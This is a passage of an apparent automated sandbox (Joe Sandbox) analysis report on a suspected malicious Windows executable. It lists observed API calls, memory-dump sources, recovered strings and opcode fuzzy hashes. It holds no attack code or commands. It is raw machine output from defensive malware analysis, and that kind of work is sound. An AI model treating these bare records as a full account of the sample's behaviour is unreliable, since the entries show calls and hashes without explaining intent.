                                      • Part of subcall function 008A2D55: GetLastError.KERNEL32(00000000,?,008A9A24), ref: 008A2D7B
                                    • _free.LIBCMT ref: 008E971C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                    • Instruction ID: 4325d7b12732718ba17752a8c7502476e4de4ce0aa15ee42fc7320b32d68b765
                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                    • Instruction Fuzzy Hash: E2515CB1D04259ABDF249F69CC81A9EBBB9FF49300F10049EF649E3252DB715A80CF59
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                    • String ID:
                                    • API String ID: 2782032738-0
                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                    • Instruction ID: c06f6d0bbcb8cb81d9b9c5401ff45e0feee9acb21e078ef95811447167fd78c0
                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                    • Instruction Fuzzy Hash: 9D41D574A007899BFF188E69D8809AE77A5FFC3364B24913DE815C7E40E7B4DD418B51
                                    APIs
                                    • _memset.LIBCMT ref: 008844CF
                                      • Part of subcall function 0088407C: _memset.LIBCMT ref: 008840FC
                                      • Part of subcall function 0088407C: _wcscpy.LIBCMT ref: 00884150
                                      • Part of subcall function 0088407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00884160
                                    • KillTimer.USER32(?,00000001,?,?), ref: 00884524
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00884533
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008BD4B9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    • Opcode ID: 1c827b7b58fbce9a258edce772c45ee051f565e4550a985e1606b1f4efa7e446
                                    • Instruction ID: 696304fb113badd45818d9eebf4fab6f295ab22be2a837dc1f186a689f435242
                                    • Opcode Fuzzy Hash: 1c827b7b58fbce9a258edce772c45ee051f565e4550a985e1606b1f4efa7e446
                                    • Instruction Fuzzy Hash: F8210A75508794AFE7329B248855BEBBBECFF01308F04009DE69ED6242D3742A84DB46
                                    APIs
                                    • _memset.LIBCMT ref: 008BEA39
                                    • 7523D0D0.COMDLG32(?), ref: 008BEA83
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                      • Part of subcall function 008A0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A07B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: NamePath$7523FullLong_memset
                                    • String ID: X
                                    • API String ID: 3285060876-3081909835
                                    • Opcode ID: 78f864be753d9af6e036065db72282af5f0b97d215cd7edeeb4888f6f323712f
                                    • Instruction ID: 2e51949517c8ef0b4777623152bb82aae4eec6c56c4143743f33bca81b45395a
                                    • Opcode Fuzzy Hash: 78f864be753d9af6e036065db72282af5f0b97d215cd7edeeb4888f6f323712f
                                    • Instruction Fuzzy Hash: 8521A131A142589BDB51AF98C845AEF7BFDFF49314F10401AE408EB241DBB499898FA2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __fread_nolock_memmove
                                    • String ID: EA06
                                    • API String ID: 1988441806-3962188686
                                    • Opcode ID: 8f6d9ce481f727261462a97cb37d35e395c92f2398d634edc594258fc9f9a289
                                    • Instruction ID: f536f45674bca0d80a777168c9c79451e297ce2bd3f5befcaff20ae01a8c38cc
                                    • Opcode Fuzzy Hash: 8f6d9ce481f727261462a97cb37d35e395c92f2398d634edc594258fc9f9a289
                                    • Instruction Fuzzy Hash: 76012D71D04258BEEB18CBA8CC16EFE7BF8DB12301F00419FF556D2181E875E6048B60
                                    APIs
                                      • Part of subcall function 008A571C: __FF_MSGBANNER.LIBCMT ref: 008A5733
                                      • Part of subcall function 008A571C: __NMSG_WRITE.LIBCMT ref: 008A573A
                                      • Part of subcall function 008A571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001), ref: 008A575F
                                    • std::exception::exception.LIBCMT ref: 008A0DEC
                                    • __CxxThrowException@8.LIBCMT ref: 008A0E01
                                      • Part of subcall function 008A859B: RaiseException.KERNEL32(?,?,00000000,00939E78,?,00000001,?,?,?,008A0E06,00000000,00939E78,00889E8C,00000001), ref: 008A85F0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID: bad allocation
                                    • API String ID: 3902256705-2104205924
                                    • Opcode ID: 8bbba947bb1bc7168712327cceac36e2f878262598945d7b2e37bf1b9529eafc
                                    • Instruction ID: 020418589a85a726176028a80eda76abc13d8b14ef94b732df1d6027bca3ddd9
                                    • Opcode Fuzzy Hash: 8bbba947bb1bc7168712327cceac36e2f878262598945d7b2e37bf1b9529eafc
                                    • Instruction Fuzzy Hash: EAF0D63590431DA6EF20BB98EC015DE77A8FF06310F000415F904E6A81DF709A9099A2
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 015F9945
                                    • ExitProcess.KERNEL32(00000000), ref: 015F9964
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$CreateExit
                                    • String ID: D
                                    • API String ID: 126409537-2746444292
                                    • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                    • Instruction ID: 7cb19ddaaa5c93dd8bc9d4367ad973c89a035aa0bb9d07555e991c873546cb4d
                                    • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                    • Instruction Fuzzy Hash: AEF0ECB554024DABDB60DFE4CD49FEE777CBF44705F048508BB0A9A184DB7496088B61
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 008E98F8
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008E990F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: ca7908eb36e60ac775beae31ffa854057beb3a8740970075f605dd3d33efc3ae
                                    • Instruction ID: b207bd1cd459db0b05e895820d6928f979690bcc1e825308983de17b2f6d31a9
                                    • Opcode Fuzzy Hash: ca7908eb36e60ac775beae31ffa854057beb3a8740970075f605dd3d33efc3ae
                                    • Instruction Fuzzy Hash: 51D05E7954430DAFDB60DBA4DC0EF9A773CEB04704F0002B1BAA4D10A1EAB0A6989B91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 55ad9965db937efe6c5940ea0aa70cc9af0cb20057a388f137b7ca89b1520733
                                    • Instruction ID: cfb3629f6525ad7239ce16fcbe5009847ed82bd69f96ba0e436807e53ebb8c1a
                                    • Opcode Fuzzy Hash: 55ad9965db937efe6c5940ea0aa70cc9af0cb20057a388f137b7ca89b1520733
                                    • Instruction Fuzzy Hash: CAF127716083099FC714DF28C580A6ABBE5FF89314F14892EF999DB251DB70EA45CF82
                                    APIs
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A0193
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 008A019B
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A01A6
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A01B1
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 008A01B9
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 008A01C1
                                      • Part of subcall function 008960F9: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00896154
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0088F9CD
                                    • OleInitialize.OLE32(00000000), ref: 0088FA4A
                                    • CloseHandle.KERNEL32(00000000), ref: 008C45C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                    • String ID:
                                    • API String ID: 3094916012-0
                                    • Opcode ID: ebd58c000e4520606c5aa073475ab415e4129c2e18aa1d2a9672ed144e424bdc
                                    • Instruction ID: 4dcd07a7359faed8c3f98b294f32cf2f0ccebfc407e62cbb45f50d82e3f1d092
                                    • Opcode Fuzzy Hash: ebd58c000e4520606c5aa073475ab415e4129c2e18aa1d2a9672ed144e424bdc
                                    • Instruction Fuzzy Hash: 0C81CEB8929B40CFC394EFB9A850E187BE5FB5A316756813AE119CB273E7704484EF11
                                    APIs
                                    • _memset.LIBCMT ref: 00884370
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00884415
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00884432
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$_memset
                                    • String ID:
                                    • API String ID: 1505330794-0
                                    • Opcode ID: 10b7acb4a44160868958cc8f18c040efce40245672cd0c1d230b444ae4babc4d
                                    • Instruction ID: 675c34df21e52efdc832f4bbf556cc1eaa39ab2f4037734c12520f3042352a5e
                                    • Opcode Fuzzy Hash: 10b7acb4a44160868958cc8f18c040efce40245672cd0c1d230b444ae4babc4d
                                    • Instruction Fuzzy Hash: E63193715097029FD721EF64D884A9BBBF8FB59308F00092EE59AC2352E7B1A944CB52
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 008A5733
                                      • Part of subcall function 008AA16B: __NMSG_WRITE.LIBCMT ref: 008AA192
                                      • Part of subcall function 008AA16B: __NMSG_WRITE.LIBCMT ref: 008AA19C
                                    • __NMSG_WRITE.LIBCMT ref: 008A573A
                                      • Part of subcall function 008AA1C8: GetModuleFileNameW.KERNEL32(00000000,009433BA,00000104,00000000,00000001,00000000), ref: 008AA25A
                                      • Part of subcall function 008AA1C8: ___crtMessageBoxW.LIBCMT ref: 008AA308
                                      • Part of subcall function 008A309F: ___crtCorExitProcess.LIBCMT ref: 008A30A5
                                      • Part of subcall function 008A309F: ExitProcess.KERNEL32 ref: 008A30AE
                                      • Part of subcall function 008A8B28: __getptd_noexit.LIBCMT ref: 008A8B28
                                    • RtlAllocateHeap.NTDLL(01550000,00000000,00000001), ref: 008A575F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    • Opcode ID: 558e93bb2c8f939942106138bce7202282ef59983c5c09b90679cac65e3c8d4e
                                    • Instruction ID: b43351bbbcd105a1f58b455429e85496e04d2abaa031c1637effdceff59b7dc6
                                    • Opcode Fuzzy Hash: 558e93bb2c8f939942106138bce7202282ef59983c5c09b90679cac65e3c8d4e
                                    • Instruction Fuzzy Hash: 8501B535244F01EAF615273CEC82A2E7398FB43765F600525F515FAD81DFB09D819672
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008E9548,?,?,?,?,?,00000004), ref: 008E98BB
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008E9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008E98D1
                                    • CloseHandle.KERNEL32(00000000,?,008E9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E98D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                                    • Instruction ID: de0ff2be360e561849c964aec510c5faef9969bcfbe01a8572e691d68e1ba027
                                    • Opcode Fuzzy Hash: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                                    • Instruction Fuzzy Hash: CAE08632144228BBD7311B54EC09FCA7B19EB06B70F104220FB54A94E087B12611A7D8
                                    APIs
                                    • _free.LIBCMT ref: 008E8D1B
                                      • Part of subcall function 008A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9A24), ref: 008A2D69
                                      • Part of subcall function 008A2D55: GetLastError.KERNEL32(00000000,?,008A9A24), ref: 008A2D7B
                                    • _free.LIBCMT ref: 008E8D2C
                                    • _free.LIBCMT ref: 008E8D3E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                    • Instruction ID: 01499fef40f49d7adec1508163be2a8999069dc41c9b7cfe767f45c7b7b60560
                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                    • Instruction Fuzzy Hash: A4E012A170264586EB35A57DAD40A9713DCEF5A3527141D1DB40DD7587CE64F8428124
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: CALL
                                    • API String ID: 0-4196123274
                                    • Opcode ID: 6642e21484f13cd4b5b71a561a90a598980cbe2fb6a558d70a1e44a78aaa31c3
                                    • Instruction ID: 6910b13d406f699039b7e32ec556b8527f2972ba60defbe37db1abc186e012b4
                                    • Opcode Fuzzy Hash: 6642e21484f13cd4b5b71a561a90a598980cbe2fb6a558d70a1e44a78aaa31c3
                                    • Instruction Fuzzy Hash: 40225D74508205DFDB28EF18C450A6ABBE1FF85314F14896EE98ADB362D735EC45CB82
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID: EA06
                                    • API String ID: 4104443479-3962188686
                                    • Opcode ID: 59ee41d0af0eaba8175910152844aebfc184eb9504d05555a9c636d0f454818f
                                    • Instruction ID: b2d7201cb93285fd9395ea982c46d223737644abc3b8f4817fb5b04ba103b7b2
                                    • Opcode Fuzzy Hash: 59ee41d0af0eaba8175910152844aebfc184eb9504d05555a9c636d0f454818f
                                    • Instruction Fuzzy Hash: 47415D23A0425E67DF21BB68C8517BE7FA6FB45304F686475FC82DB282D6345D4483A2
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
